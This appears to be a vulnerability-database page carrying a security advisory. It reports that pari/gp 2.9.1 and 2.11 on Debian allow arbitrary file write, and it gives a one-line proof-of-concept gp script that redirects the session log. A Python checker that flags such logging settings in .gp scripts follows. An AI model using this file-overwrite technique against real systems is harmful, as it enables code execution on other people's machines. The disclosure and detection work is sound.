pari/gp 2.x Arbitrary File Overwrite - CXSecurity.com

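Vulnerability ID 1838013 Vulnerability type
Published 2019-11-27 Updated 2019-11-27
CVE ID N/A CNNVD-ID N/A
Affected platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019110168
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability EXP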
pari/gp on Debian stable allows arbitrary file write

pari/gp is a CAS (computer algebra system).
pari/gp version 2.9.1 on Debian stretch and 2.11 on Debian buster
allow arbitrary file write and hence arbitrary code execution.
A script loaded with \r can set the logfile default to a path of its
choosing and then enable logging.

PoC:
========
\\ a.gp
\\ to run: \r a.gp
default("logfile","/tmp/a.txt");default("log",1);print("log(1)");
========

Also of mathematical interest: pari was missing solutions
to Thue equations when assuming GRH (the fix changed a polynomial
bound to an exponential bound):
http://pari.math.u-bordeaux.fr/archives/pari-dev-1207/msg00000.html
t=thue(thueinit(x^3+92*x+1,0),3^3);t

-- 
CV:    https://j.ludost.net/resumegg.pdf
site:  http://www.guninski.com
blog:  https://j.ludost.net/blog
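
A pre-run check for the logging settings used in the PoC above, as an added example that is not part of the original advisory or of pari/gp: it lists every place a .gp script changes the `log` or `logfile` default, or uses the `\l` meta-command, before the script is loaded with `\r`. The function names and the sample script are constructed for illustration.

```python
import re

# Constructed sample input, modelled on the a.gp PoC in the advisory.
SAMPLE = r'''\\ a.gp (constructed sample)
default("logfile","/tmp/a.txt");default("log",1);print("log(1)");
x = 1; \\ default(log,1) inside a comment is ignored
\l /tmp/b.txt
t=thue(thueinit(x^3+92*x+1,0),3^3);t
'''

# Defaults that enable gp's session log or choose the file it is written to.
LOG_DEFAULTS = {"logfile", "log"}
# default("key", value) or default(key, value): gp accepts the key quoted or bare.
DEFAULT_CALL = re.compile(r'default\s*\(\s*"?\s*(\w+)\s*"?\s*,\s*([^)]*)\)')
# \l [file] meta-command: toggles logging and optionally renames the log file.
META_LOG = re.compile(r'^\s*\\l(\s+\S.*)?$')

def strip_comment(line):
    """Cut a trailing gp one-line comment, ignoring backslashes inside strings."""
    in_str, i = False, 0
    while i < len(line):
        if line[i] == '"':
            in_str = not in_str
        elif line[i] == '\\':
            if in_str:
                i += 1                      # skip the escaped character
            elif line[i:i + 2] == '\\\\':
                return line[:i]             # start of a one-line comment
        i += 1
    return line

def scan_gp_script(text):
    """Return (line_no, setting, argument) for every logging-related change."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = strip_comment(raw)
        meta = META_LOG.match(line)
        if meta:
            findings.append((no, "\\l", (meta.group(1) or "").strip()))
        for key, value in DEFAULT_CALL.findall(line):
            if key in LOG_DEFAULTS:
                findings.append((no, key, value.strip()))
    return findings

if __name__ == "__main__":
    for no, setting, arg in scan_gp_script(SAMPLE):
        print(f"line {no}: {setting} -> {arg or '(toggle)'}")
```

This is a textual triage check, not a sandbox: scripts from untrusted sources should still be run under an account that cannot write to anything of value.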